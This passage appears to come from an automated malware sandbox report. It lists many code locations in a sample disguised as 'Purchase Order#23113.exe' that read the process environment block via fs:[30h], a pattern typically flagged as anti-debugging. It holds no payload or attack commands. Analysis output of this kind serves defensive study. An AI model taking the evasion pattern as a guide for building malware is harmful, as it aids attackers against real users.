          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E284 mov eax, dword ptr fs:[00000030h]2_2_0176E284
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E284 mov eax, dword ptr fs:[00000030h]2_2_0176E284
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B0283 mov eax, dword ptr fs:[00000030h]2_2_017B0283
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B0283 mov eax, dword ptr fs:[00000030h]2_2_017B0283
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B0283 mov eax, dword ptr fs:[00000030h]2_2_017B0283
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176656A mov eax, dword ptr fs:[00000030h]2_2_0176656A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176656A mov eax, dword ptr fs:[00000030h]2_2_0176656A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176656A mov eax, dword ptr fs:[00000030h]2_2_0176656A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738550 mov eax, dword ptr fs:[00000030h]2_2_01738550
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738550 mov eax, dword ptr fs:[00000030h]2_2_01738550
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C6500 mov eax, dword ptr fs:[00000030h]2_2_017C6500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017325E0 mov eax, dword ptr fs:[00000030h]2_2_017325E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C5ED mov eax, dword ptr fs:[00000030h]2_2_0176C5ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C5ED mov eax, dword ptr fs:[00000030h]2_2_0176C5ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017365D0 mov eax, dword ptr fs:[00000030h]2_2_017365D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A5D0 mov eax, dword ptr fs:[00000030h]2_2_0176A5D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A5D0 mov eax, dword ptr fs:[00000030h]2_2_0176A5D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E5CF mov eax, dword ptr fs:[00000030h]2_2_0176E5CF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E5CF mov eax, dword ptr fs:[00000030h]2_2_0176E5CF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017545B1 mov eax, dword ptr fs:[00000030h]2_2_017545B1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017545B1 mov eax, dword ptr fs:[00000030h]2_2_017545B1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B05A7 mov eax, dword ptr fs:[00000030h]2_2_017B05A7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B05A7 mov eax, dword ptr fs:[00000030h]2_2_017B05A7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B05A7 mov eax, dword ptr fs:[00000030h]2_2_017B05A7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E59C mov eax, dword ptr fs:[00000030h]2_2_0176E59C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01732582 mov eax, dword ptr fs:[00000030h]2_2_01732582
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01732582 mov ecx, dword ptr fs:[00000030h]2_2_01732582
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01764588 mov eax, dword ptr fs:[00000030h]2_2_01764588
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175A470 mov eax, dword ptr fs:[00000030h]2_2_0175A470
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175A470 mov eax, dword ptr fs:[00000030h]2_2_0175A470
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175A470 mov eax, dword ptr fs:[00000030h]2_2_0175A470
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BC460 mov ecx, dword ptr fs:[00000030h]2_2_017BC460
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EA456 mov eax, dword ptr fs:[00000030h]2_2_017EA456
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172645D mov eax, dword ptr fs:[00000030h]2_2_0172645D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175245A mov eax, dword ptr fs:[00000030h]2_2_0175245A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E420 mov eax, dword ptr fs:[00000030h]2_2_0172E420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E420 mov eax, dword ptr fs:[00000030h]2_2_0172E420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E420 mov eax, dword ptr fs:[00000030h]2_2_0172E420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172C427 mov eax, dword ptr fs:[00000030h]2_2_0172C427
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01768402 mov eax, dword ptr fs:[00000030h]2_2_01768402
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01768402 mov eax, dword ptr fs:[00000030h]2_2_01768402
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01768402 mov eax, dword ptr fs:[00000030h]2_2_01768402
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017304E5 mov ecx, dword ptr fs:[00000030h]2_2_017304E5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017644B0 mov ecx, dword ptr fs:[00000030h]2_2_017644B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BA4B0 mov eax, dword ptr fs:[00000030h]2_2_017BA4B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017364AB mov eax, dword ptr fs:[00000030h]2_2_017364AB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EA49A mov eax, dword ptr fs:[00000030h]2_2_017EA49A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738770 mov eax, dword ptr fs:[00000030h]2_2_01738770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730750 mov eax, dword ptr fs:[00000030h]2_2_01730750
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BE75D mov eax, dword ptr fs:[00000030h]2_2_017BE75D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772750 mov eax, dword ptr fs:[00000030h]2_2_01772750
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772750 mov eax, dword ptr fs:[00000030h]2_2_01772750
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B4755 mov eax, dword ptr fs:[00000030h]2_2_017B4755
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176674D mov esi, dword ptr fs:[00000030h]2_2_0176674D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176674D mov eax, dword ptr fs:[00000030h]2_2_0176674D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176674D mov eax, dword ptr fs:[00000030h]2_2_0176674D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176273C mov eax, dword ptr fs:[00000030h]2_2_0176273C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176273C mov ecx, dword ptr fs:[00000030h]2_2_0176273C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176273C mov eax, dword ptr fs:[00000030h]2_2_0176273C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AC730 mov eax, dword ptr fs:[00000030h]2_2_017AC730
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C720 mov eax, dword ptr fs:[00000030h]2_2_0176C720
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C720 mov eax, dword ptr fs:[00000030h]2_2_0176C720
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730710 mov eax, dword ptr fs:[00000030h]2_2_01730710
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01760710 mov eax, dword ptr fs:[00000030h]2_2_01760710
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C700 mov eax, dword ptr fs:[00000030h]2_2_0176C700
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017347FB mov eax, dword ptr fs:[00000030h]2_2_017347FB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017347FB mov eax, dword ptr fs:[00000030h]2_2_017347FB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017527ED mov eax, dword ptr fs:[00000030h]2_2_017527ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017527ED mov eax, dword ptr fs:[00000030h]2_2_017527ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017527ED mov eax, dword ptr fs:[00000030h]2_2_017527ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BE7E1 mov eax, dword ptr fs:[00000030h]2_2_017BE7E1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173C7C0 mov eax, dword ptr fs:[00000030h]2_2_0173C7C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B07C3 mov eax, dword ptr fs:[00000030h]2_2_017B07C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017307AF mov eax, dword ptr fs:[00000030h]2_2_017307AF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E47A0 mov eax, dword ptr fs:[00000030h]2_2_017E47A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D678E mov eax, dword ptr fs:[00000030h]2_2_017D678E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01762674 mov eax, dword ptr fs:[00000030h]2_2_01762674
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F866E mov eax, dword ptr fs:[00000030h]2_2_017F866E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F866E mov eax, dword ptr fs:[00000030h]2_2_017F866E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A660 mov eax, dword ptr fs:[00000030h]2_2_0176A660
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A660 mov eax, dword ptr fs:[00000030h]2_2_0176A660
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174C640 mov eax, dword ptr fs:[00000030h]2_2_0174C640
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E627 mov eax, dword ptr fs:[00000030h]2_2_0174E627
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01766620 mov eax, dword ptr fs:[00000030h]2_2_01766620
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01768620 mov eax, dword ptr fs:[00000030h]2_2_01768620
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173262C mov eax, dword ptr fs:[00000030h]2_2_0173262C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772619 mov eax, dword ptr fs:[00000030h]2_2_01772619
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE609 mov eax, dword ptr fs:[00000030h]2_2_017AE609
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174260B mov eax, dword ptr fs:[00000030h]2_2_0174260B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174260B mov eax, dword ptr fs:[00000030h]2_2_0174260B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174260B mov eax, dword ptr fs:[00000030h]2_2_0174260B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174260B mov eax, dword ptr fs:[00000030h]2_2_0174260B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174260B mov eax, dword ptr fs:[00000030h]2_2_0174260B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174260B mov eax, dword ptr fs:[00000030h]2_2_0174260B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174260B mov eax, dword ptr fs:[00000030h]2_2_0174260B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE6F2 mov eax, dword ptr fs:[00000030h]2_2_017AE6F2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE6F2 mov eax, dword ptr fs:[00000030h]2_2_017AE6F2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE6F2 mov eax, dword ptr fs:[00000030h]2_2_017AE6F2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE6F2 mov eax, dword ptr fs:[00000030h]2_2_017AE6F2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B06F1 mov eax, dword ptr fs:[00000030h]2_2_017B06F1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B06F1 mov eax, dword ptr fs:[00000030h]2_2_017B06F1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0176A6C7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A6C7 mov eax, dword ptr fs:[00000030h]2_2_0176A6C7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017666B0 mov eax, dword ptr fs:[00000030h]2_2_017666B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C6A6 mov eax, dword ptr fs:[00000030h]2_2_0176C6A6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734690 mov eax, dword ptr fs:[00000030h]2_2_01734690
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734690 mov eax, dword ptr fs:[00000030h]2_2_01734690
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D4978 mov eax, dword ptr fs:[00000030h]2_2_017D4978
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D4978 mov eax, dword ptr fs:[00000030h]2_2_017D4978
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BC97C mov eax, dword ptr fs:[00000030h]2_2_017BC97C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01756962 mov eax, dword ptr fs:[00000030h]2_2_01756962
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01756962 mov eax, dword ptr fs:[00000030h]2_2_01756962
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01756962 mov eax, dword ptr fs:[00000030h]2_2_01756962
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0177096E mov eax, dword ptr fs:[00000030h]2_2_0177096E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0177096E mov edx, dword ptr fs:[00000030h]2_2_0177096E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0177096E mov eax, dword ptr fs:[00000030h]2_2_0177096E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B0946 mov eax, dword ptr fs:[00000030h]2_2_017B0946
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B892A mov eax, dword ptr fs:[00000030h]2_2_017B892A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C892B mov eax, dword ptr fs:[00000030h]2_2_017C892B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BC912 mov eax, dword ptr fs:[00000030h]2_2_017BC912
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01728918 mov eax, dword ptr fs:[00000030h]2_2_01728918
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01728918 mov eax, dword ptr fs:[00000030h]2_2_01728918
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE908 mov eax, dword ptr fs:[00000030h]2_2_017AE908
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE908 mov eax, dword ptr fs:[00000030h]2_2_017AE908
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017629F9 mov eax, dword ptr fs:[00000030h]2_2_017629F9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017629F9 mov eax, dword ptr fs:[00000030h]2_2_017629F9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BE9E0 mov eax, dword ptr fs:[00000030h]2_2_017BE9E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A9D0 mov eax, dword ptr fs:[00000030h]2_2_0173A9D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A9D0 mov eax, dword ptr fs:[00000030h]2_2_0173A9D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A9D0 mov eax, dword ptr fs:[00000030h]2_2_0173A9D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A9D0 mov eax, dword ptr fs:[00000030h]2_2_0173A9D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A9D0 mov eax, dword ptr fs:[00000030h]2_2_0173A9D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A9D0 mov eax, dword ptr fs:[00000030h]2_2_0173A9D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017649D0 mov eax, dword ptr fs:[00000030h]2_2_017649D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FA9D3 mov eax, dword ptr fs:[00000030h]2_2_017FA9D3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C69C0 mov eax, dword ptr fs:[00000030h]2_2_017C69C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804940 mov eax, dword ptr fs:[00000030h]2_2_01804940
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B89B3 mov esi, dword ptr fs:[00000030h]2_2_017B89B3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B89B3 mov eax, dword ptr fs:[00000030h]2_2_017B89B3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B89B3 mov eax, dword ptr fs:[00000030h]2_2_017B89B3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A0 mov eax, dword ptr fs:[00000030h]2_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017309AD mov eax, dword ptr fs:[00000030h]2_2_017309AD
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017309AD mov eax, dword ptr fs:[00000030h]2_2_017309AD
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BE872 mov eax, dword ptr fs:[00000030h]2_2_017BE872
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BE872 mov eax, dword ptr fs:[00000030h]2_2_017BE872
